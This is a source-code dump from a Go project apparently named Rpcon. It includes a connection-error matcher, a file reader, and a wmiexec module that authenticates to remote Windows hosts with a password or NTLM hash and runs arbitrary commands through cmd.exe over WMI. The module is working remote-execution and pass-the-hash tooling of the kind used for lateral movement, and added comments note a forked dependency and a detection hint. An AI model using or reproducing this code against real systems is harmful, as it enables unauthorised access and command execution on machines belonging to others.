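// connection-level error fragments listed below. A nil error yields false.
func CheckErrs(err error) bool {
	if err == nil {
		return false
	}
	errs := []string{
		"closed by the remote host", "too many connections",
		"i/o timeout", "EOF", "A connection attempt failed",
		"established connection failed", "connection attempt failed",
		"Unable to read", "is not allowed to connect to this",
		"no pg_hba.conf entry",
		"No connection could be made",
		"invalid packet size",
		"bad connection",
	}
	// Lower-case the message once instead of once per fragment.
	msg := strings.ToLower(err.Error())
	for _, key := range errs {
		if strings.Contains(msg, strings.ToLower(key)) {
			return true
		}
	}
	return false
}
--------------------------------------------------------------------------------
/pkg/readfile.go:
--------------------------------------------------------------------------------
package pkg

import (
	"log"
	"os"
)

// Readfile returns the whole content of filename as a string. When the file
// cannot be read it logs a message and returns the empty string together with
// the error.
func Readfile(filename string) (string, error) {
	data, err := os.ReadFile(filename)
	if err != nil {
		log.Println("打开文件失败")
		return "", err
	}
	return string(data), nil
}
-------------------------------------------------------------------------------- /pkg/wmiexec.go: -------------------------------------------------------------------------------- 1 | package pkg 2 | 3 | import ( 4 | "Rpcon/common" 5 | "errors" 6 | "fmt" 7 | 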
"github.com/C-Sto/goWMIExec/pkg/wmiexec" 8 | ) 9 | 10 |
// ClientHost is passed to WMIExec as the client hostname; nothing in this
// file assigns it.
var ClientHost string

// Wmiexec builds the target as common.Host:common.Port and calls WMIExec with
// the user, password, hash, domain and command from the common package.
//
// Supply-chain note: go.mod carries a replace directive that maps
// github.com/C-Sto/goWMIExec to github.com/shadow1ng/goWMIExec v0.0.2, so the
// code that runs under this import path is the fork.
func Wmiexec() (flag bool, err error) {
	target := fmt.Sprintf("%s:%v", common.Host, common.Port)
	return WMIExec(target, common.User, common.Password, common.Hash, common.Domain, common.Code, ClientHost, "", nil)
}

// WMIExec authenticates to target through the wmiexec library and, when
// command is not empty, runs it prefixed with
// "C:\Windows\system32\cmd.exe /c ".
//
// flag becomes true once Auth has succeeded and stays true if a later step
// fails, so it reports authentication, not command execution. When cfgIn is
// nil a config is built from the credential arguments.
//
// Detection: the fixed cmd.exe /c prefix shows up in the command line of the
// process created on the target, so process-creation logging records it.
func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) {
	if cfgIn == nil {
		cfg, cfgErr := wmiexec.NewExecConfig(username, password, hash, domain, target, clientHostname, true, nil, nil)
		if cfgErr != nil {
			return false, cfgErr
		}
		cfgIn = &cfg
	}

	execer := wmiexec.NewExecer(cfgIn)
	if err = execer.SetTargetBinding(binding); err != nil {
		return false, err
	}
	if err = execer.Auth(); err != nil {
		return false, err
	}

	// Authentication succeeded; from here on flag is true.
	if command == "" {
		return true, nil
	}

	command = "C:\\Windows\\system32\\cmd.exe /c " + command
	if execer.TargetRPCPort == 0 {
		return true, errors.New("RPC Port is 0, cannot connect")
	}
	if err = execer.RPCConnect(); err != nil {
		return true, err
	}
	return true, execer.Exec(command)
}
--------------------------------------------------------------------------------